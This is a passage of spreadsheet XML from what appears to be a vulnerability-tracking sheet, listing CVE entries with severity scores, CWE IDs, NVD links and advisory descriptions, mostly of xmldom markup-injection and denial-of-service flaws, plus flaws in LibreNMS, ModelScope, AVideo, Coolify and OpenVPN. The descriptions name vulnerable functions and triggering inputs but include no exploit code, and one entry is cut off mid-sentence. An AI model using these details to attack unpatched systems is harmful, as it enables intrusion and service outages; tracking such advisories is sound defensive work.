        </is>
      </c>
      <c r="L1268" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.15 and 0.9.12, and in xmldom version 0.6.0 and earlier, the DOCUMENT_TYPE_NODE branch in lib/dom.js validates publicId, systemId, and internalSubset under requireWellFormed: true but emits DocumentType.name verbatim. A name containing &gt; or whitespace can terminate the &lt;!DOCTYPE ...&gt; declaration and inject sibling markup; the value can be supplied through createDocumentType() on the 0.8.x and unscoped lines or through a direct DocumentType.name property write on every affected line. The default path and legacy creation-time behavior remain permissive, while the vulnerable strict path fails to enforce an XML Name. This issue is fixed in @xmldom/xmldom versions 0.8.15 and 0.9.12; no fixed version is available for xmldom.</t>
        </is>
      </c>
      <c r="M1268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83608</t>
        </is>
      </c>
    </row>
    <row r="1269">
      <c r="A1269" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83609</t>
        </is>
      </c>
      <c r="C1269" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1269" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1269" s="5" t="inlineStr"/>
      <c r="F1269" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1269" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1269" s="5" t="inlineStr"/>
      <c r="I1269" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1269" s="5" t="inlineStr"/>
      <c r="K1269" s="5" t="inlineStr">
        <is>
          <t>CWE-625, CWE-91</t>
        </is>
      </c>
      <c r="L1269" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. From 0.9.0 until 0.9.12, the shared reg() builder in lib/grammar.js compiles the anchored QName_exact validator with the multiline flag, so ^ and $ validate only one line instead of the complete name. createElementNS, createAttributeNS, createDocumentType, and createAttribute consequently accept a malformed XML name whose first line is valid and whose later text injects markup when serialized through either the default path or requireWellFormed: true. The triggering ECMAScript line terminators are U+000A, U+000D, U+2028, and U+2029. This issue is fixed in @xmldom/xmldom version 0.9.12.</t>
        </is>
      </c>
      <c r="M1269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83609</t>
        </is>
      </c>
    </row>
    <row r="1270">
      <c r="A1270" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83612</t>
        </is>
      </c>
      <c r="C1270" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1270" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1270" s="5" t="inlineStr"/>
      <c r="F1270" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1270" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1270" s="5" t="inlineStr"/>
      <c r="I1270" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1270" s="5" t="inlineStr"/>
      <c r="K1270" s="5" t="inlineStr">
        <is>
          <t>CWE-178, CWE-400</t>
        </is>
      </c>
      <c r="L1270" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. From 0.9.0-beta.1 until 0.9.12, HTML-mode parsing through DOMParser.parseFromString() mishandles a mixed-case closing tag for the script, style, textarea, or title raw-text elements. parseHtmlSpecialContent, selected by isHTMLRawTextElement or isHTMLEscapableRawTextElement, uses a case-sensitive indexOf() and then calls substring() with a missing-close result of negative one, causing unstable parser progression and quadratic output amplification. A small untrusted text/html document can consequently consume disproportionate CPU and memory when parsed and serialized. This issue is fixed in @xmldom/xmldom version 0.9.12.</t>
        </is>
      </c>
      <c r="M1270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83612</t>
        </is>
      </c>
    </row>
    <row r="1271">
      <c r="A1271" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83613</t>
        </is>
      </c>
      <c r="C1271" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1271" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1271" s="5" t="inlineStr"/>
      <c r="F1271" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1271" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H1271" s="5" t="inlineStr"/>
      <c r="I1271" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1271" s="5" t="inlineStr"/>
      <c r="K1271" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L1271" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.15 and 0.9.12, and in xmldom version 0.6.0 and earlier, DOMHandler.startElement in lib/dom-parser.js inserts every parsed attribute through setAttributeNode, while NamedNodeMap.setNamedItem in lib/dom.js calls the linear getNamedItem or getNamedItemNS lookup for each insertion. A well-formed element with many distinct attributes therefore requires quadratic comparisons during DOMParser.parseFromString() and can stall a Node.js event loop before application validation. This issue is fixed in @xmldom/xmldom versions 0.8.15 and 0.9.12; no fixed version is available for xmldom.</t>
        </is>
      </c>
      <c r="M1271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83613</t>
        </is>
      </c>
    </row>
    <row r="1272">
      <c r="A1272" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83614</t>
        </is>
      </c>
      <c r="C1272" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1272" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1272" s="5" t="inlineStr"/>
      <c r="F1272" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1272" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1272" s="5" t="inlineStr"/>
      <c r="I1272" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1272" s="5" t="inlineStr"/>
      <c r="K1272" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="L1272" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.15 and 0.9.12, and in xmldom versions 0.3.0 through 0.6.0, two independent quadratic paths can cause denial of service. In lib/sax.js, parseElementStartPart repeatedly rescans a malformed tag name to the next &gt; during single-character recovery; in lib/dom.js, normalize() repeatedly removes and appends adjacent text nodes, causing quadratic reindexing and string rebuilding. The first path is reachable through default DOMParser.parseFromString() processing, while the second is also reachable through a direct normalize() call on a programmatically constructed DOM, and endDocument invokes that normalization after parsing. This issue is fixed in @xmldom/xmldom versions 0.8.15 and 0.9.12; no fixed version is available for xmldom.</t>
        </is>
      </c>
      <c r="M1272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83614</t>
        </is>
      </c>
    </row>
    <row r="1273">
      <c r="A1273" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83615</t>
        </is>
      </c>
      <c r="C1273" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1273" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1273" s="5" t="inlineStr"/>
      <c r="F1273" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1273" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1273" s="5" t="inlineStr"/>
      <c r="I1273" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1273" s="5" t="inlineStr"/>
      <c r="K1273" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1273" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.15 and 0.9.12, and in xmldom versions 0.1.5 through 0.6.0, appendElement in lib/sax.js uses _copy to clone the complete currentNSMap for each nested element that declares a new namespace prefix. Keeping every ancestor map live on the parse stack creates quadratic peak namespace-map storage, so a small highly compressible XML document can exhaust the process heap before application validation. This issue is fixed in @xmldom/xmldom versions 0.8.15 and 0.9.12; no fixed version is available for xmldom.</t>
        </is>
      </c>
      <c r="M1273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83615</t>
        </is>
      </c>
    </row>
    <row r="1274">
      <c r="A1274" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83616</t>
        </is>
      </c>
      <c r="C1274" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1274" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1274" s="5" t="inlineStr"/>
      <c r="F1274" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1274" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1274" s="5" t="inlineStr"/>
      <c r="I1274" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1274" s="5" t="inlineStr"/>
      <c r="K1274" s="5" t="inlineStr">
        <is>
          <t>CWE-91</t>
        </is>
      </c>
      <c r="L1274" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.15 and 0.9.12, and in xmldom version 0.6.0 and earlier, Document.createProcessingInstruction(target, data) in lib/dom.js accepts an unvalidated target, while the requireWellFormed: true serializer checks only for a colon and the reserved case-insensitive xml name on 0.9.x and performs no target check on 0.8.x. Because serialization emits &lt;?target data?&gt;, a target containing &gt;, ?, whitespace, or another invalid XML-name character can break the processing-instruction boundary and inject XML structure. This issue is fixed in @xmldom/xmldom versions 0.8.15 and 0.9.12; no fixed version is available for xmldom.</t>
        </is>
      </c>
      <c r="M1274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83616</t>
        </is>
      </c>
    </row>
    <row r="1275">
      <c r="A1275" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83617</t>
        </is>
      </c>
      <c r="C1275" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1275" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1275" s="5" t="inlineStr"/>
      <c r="F1275" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1275" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1275" s="5" t="inlineStr"/>
      <c r="I1275" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1275" s="5" t="inlineStr"/>
      <c r="K1275" s="5" t="inlineStr">
        <is>
          <t>CWE-625, CWE-91</t>
        </is>
      </c>
      <c r="L1275" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. From 0.9.11 until 0.9.12, the requireWellFormed: true element and attribute name checks use the anchored QName_exact expression produced by reg() in lib/grammar.js, which inherits the multiline flag. A name with a valid first line followed by U+000A, U+000D, U+2028, or U+2029 and breakout markup therefore passes validation and is emitted verbatim in element start and end tags or attribute names. This bypasses the strict-serialization checks introduced for the earlier element-name and attribute-name injection advisories, while the default serialization path remains outside the strict guarantee. This issue is fixed in @xmldom/xmldom version 0.9.12.</t>
        </is>
      </c>
      <c r="M1275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83617</t>
        </is>
      </c>
    </row>
    <row r="1276">
      <c r="A1276" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83618</t>
        </is>
      </c>
      <c r="C1276" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1276" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1276" s="5" t="inlineStr"/>
      <c r="F1276" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1276" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1276" s="5" t="inlineStr"/>
      <c r="I1276" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1276" s="5" t="inlineStr"/>
      <c r="K1276" s="5" t="inlineStr">
        <is>
          <t>CWE-625, CWE-91</t>
        </is>
      </c>
      <c r="L1276" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. From 0.9.10 until 0.9.12, the requireWellFormed: true serializer validates DocumentType.publicId and DocumentType.systemId with PubidLiteral_match and SystemLiteral_match expressions produced by reg() in lib/grammar.js, which inherit the multiline flag. A complete valid literal on the first line can therefore satisfy the matcher while U+000A, U+000D, U+2028, or U+2029 and breakout markup remain in the emitted &lt;!DOCTYPE ...&gt; declaration. This bypasses the strict-serialization mitigation for the earlier DocumentType injection advisory; creation and direct property assignment remain unvalidated by design. This issue is fixed in @xmldom/xmldom version 0.9.12.</t>
        </is>
      </c>
      <c r="M1276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83618</t>
        </is>
      </c>
    </row>
    <row r="1277">
      <c r="A1277" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83619</t>
        </is>
      </c>
      <c r="C1277" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1277" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1277" s="5" t="inlineStr"/>
      <c r="F1277" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1277" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H1277" s="5" t="inlineStr"/>
      <c r="I1277" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1277" s="5" t="inlineStr"/>
      <c r="K1277" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="L1277" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. From 0.7.0 until 0.8.15, the release-0.8.x parser in lib/sax.js trims captured end-tag names with the unanchored global expression /[ \t\n\r]+$/g. For an end tag containing a long whitespace run followed by a non-whitespace character, the expression retries from each possible starting position and backtracks quadratically before failing its end anchor. DOMParser.parseFromString() reaches the path under default options, allowing a small unauthenticated XML input to stall the Node.js event loop; the 0.9.x and unscoped npm lines do not contain this expression. This issue is fixed in @xmldom/xmldom version 0.8.15.</t>
        </is>
      </c>
      <c r="M1277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83619</t>
        </is>
      </c>
    </row>
    <row r="1278">
      <c r="A1278" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84190</t>
        </is>
      </c>
      <c r="C1278" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1278" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1278" s="5" t="inlineStr"/>
      <c r="F1278" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1278" s="5" t="inlineStr"/>
      <c r="H1278" s="5" t="inlineStr"/>
      <c r="I1278" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1278" s="5" t="inlineStr"/>
      <c r="K1278" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L1278" s="5" t="inlineStr">
        <is>
          <t>LibreNMS versions before 26.5.0 contain a remote code execution vulnerability in the AboutController where the snmpget configuration parameter is passed to shell_exec() without proper validation. An authenticated administrator can modify the snmpget configuration to point to a malicious executable file and trigger code execution by accessing the /about endpoint.</t>
        </is>
      </c>
      <c r="M1278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84190</t>
        </is>
      </c>
    </row>
    <row r="1279">
      <c r="A1279" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84202</t>
        </is>
      </c>
      <c r="C1279" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1279" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1279" s="5" t="inlineStr"/>
      <c r="F1279" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1279" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1279" s="5" t="inlineStr"/>
      <c r="I1279" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1279" s="5" t="inlineStr"/>
      <c r="K1279" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L1279" s="5" t="inlineStr">
        <is>
          <t>ModelScope uses PyYAML's unsafe yaml.Loader to parse model configuration files, allowing arbitrary code execution through Python object construction tags. Attackers can craft malicious model repositories with poisoned configuration files that execute code when loaded by users.</t>
        </is>
      </c>
      <c r="M1279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84202</t>
        </is>
      </c>
    </row>
    <row r="1280">
      <c r="A1280" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84208</t>
        </is>
      </c>
      <c r="C1280" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1280" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1280" s="5" t="inlineStr"/>
      <c r="F1280" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1280" s="5" t="inlineStr"/>
      <c r="H1280" s="5" t="inlineStr"/>
      <c r="I1280" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1280" s="5" t="inlineStr"/>
      <c r="K1280" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1280" s="5" t="inlineStr">
        <is>
          <t>AVideo through version 29.0 contains an unauthenticated SQL injection vulnerability in the User_Location plugin's regions.json.php and cities.json.php endpoints. The country and region GET parameters are passed directly into SQL queries without escaping or prepared statement binding, allowing unauthenticated attackers to execute UNION-based SQL injection to read arbitrary database contents including password hashes and sensitive data.</t>
        </is>
      </c>
      <c r="M1280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84208</t>
        </is>
      </c>
    </row>
    <row r="1281">
      <c r="A1281" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84304</t>
        </is>
      </c>
      <c r="C1281" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1281" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1281" s="5" t="inlineStr"/>
      <c r="F1281" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1281" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1281" s="5" t="inlineStr"/>
      <c r="I1281" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1281" s="5" t="inlineStr"/>
      <c r="K1281" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L1281" s="5" t="inlineStr">
        <is>
          <t>gRPC-Go is</t>
        </is>
      </c>
      <c r="M1281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84304</t>
        </is>
      </c>
    </row>
    <row r="1282">
      <c r="A1282" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84476</t>
        </is>
      </c>
      <c r="C1282" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1282" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1282" s="5" t="inlineStr"/>
      <c r="F1282" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1282" s="5" t="inlineStr"/>
      <c r="H1282" s="5" t="inlineStr"/>
      <c r="I1282" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1282" s="5" t="inlineStr"/>
      <c r="K1282" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L1282" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo fails to validate trusted proxies before accepting X-Real-IP and X-Forwarded-For headers, allowing attackers to spoof the client address used by enforceRateLimit(). Attackers can rotate the header value per request to bypass login rate limiting and perform unlimited credential guessing attacks.</t>
        </is>
      </c>
      <c r="M1282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84476</t>
        </is>
      </c>
    </row>
    <row r="1283">
      <c r="A1283" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84482</t>
        </is>
      </c>
      <c r="C1283" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1283" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1283" s="5" t="inlineStr"/>
      <c r="F1283" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1283" s="5" t="inlineStr"/>
      <c r="H1283" s="5" t="inlineStr"/>
      <c r="I1283" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1283" s="5" t="inlineStr"/>
      <c r="K1283" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L1283" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit 9c39d8c8 contains a cross-site request forgery vulnerability in the get_domain() and isSameDomain() functions that fail to properly validate referer origins. Attackers can forge requests from sibling subdomains or unparseable long-gTLD origins to perform administrative ObjectYPT writes including live server configuration changes.</t>
        </is>
      </c>
      <c r="M1283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84482</t>
        </is>
      </c>
    </row>
    <row r="1284">
      <c r="A1284" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84694</t>
        </is>
      </c>
      <c r="C1284" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1284" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1284" s="5" t="inlineStr"/>
      <c r="F1284" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1284" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1284" s="5" t="inlineStr"/>
      <c r="I1284" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1284" s="5" t="inlineStr"/>
      <c r="K1284" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1284" s="5" t="inlineStr">
        <is>
          <t>Coolify before 4.2.0 fails to properly escape environment variable key names in Docker commands executed over SSH on managed servers. Authenticated attackers can inject shell metacharacters into environment variable keys to execute arbitrary commands on the server host outside containers.</t>
        </is>
      </c>
      <c r="M1284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84694</t>
        </is>
      </c>
    </row>
    <row r="1285">
      <c r="A1285" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84715</t>
        </is>
      </c>
      <c r="C1285" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1285" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1285" s="5" t="inlineStr"/>
      <c r="F1285" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1285" s="5" t="inlineStr"/>
      <c r="H1285" s="5" t="inlineStr"/>
      <c r="I1285" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1285" s="5" t="inlineStr"/>
      <c r="K1285" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1285" s="5" t="inlineStr">
        <is>
          <t>FeatherPanel versions before 1.3.7.10 fail to validate permissions in the SubuserController updateSubuser handler, allowing authenticated subusers to modify their own permission records. A subuser with minimal permissions can send a crafted request to grant themselves full server control, enabling unauthorized access to sensitive data, backups, and server configuration.</t>
        </is>
      </c>
      <c r="M1285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84715</t>
        </is>
      </c>
    </row>
    <row r="1286">
      <c r="A1286" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84732</t>
        </is>
      </c>
      <c r="C1286" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1286" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1286" s="5" t="inlineStr"/>
      <c r="F1286" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1286" s="5" t="inlineStr"/>
      <c r="H1286" s="5" t="inlineStr"/>
      <c r="I1286" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1286" s="5" t="inlineStr"/>
      <c r="K1286" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L1286" s="5" t="inlineStr">
        <is>
          <t>Retransmissions of ACK packet ID in OpenVPN through 2.6.22 and 2.7.6 allow remote unauthenticated attackers to cause a denial of service via crafted inputs that trigger a timeout integer overflow</t>
        </is>
      </c>
      <c r="M1286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84732</t>
        </is>
      </c>
    </row>
    <row r="1287">
      <c r="A1287" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85147</t>
        </is>
      </c>
      <c r="C1287" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1287" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1287" s="5" t="inlineStr"/>
      <c r="F1287" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1287" s="5" t="inlineStr"/>
      <c r="H1287" s="5" t="inlineStr"/>
      <c r="I1287" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1287" s="5" t="inlineStr"/>
      <c r="K1287" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L1287" s="5" t="inlineStr">
        <is>
          <t>SmartIT Desktop Manager developed by Lightstar has a Use of Hard-coded Credentials vulnerability. Unauthenticated remote attackers can obtain a specific password from the source code, which can be used to retrieve the AES encryption key used for communication.</t>
        </is>
      </c>
      <c r="M1287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85147</t>
        </is>
      </c>
    </row>
    <row r="1288">
      <c r="A1288" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85155</t>
        </is>
      </c>
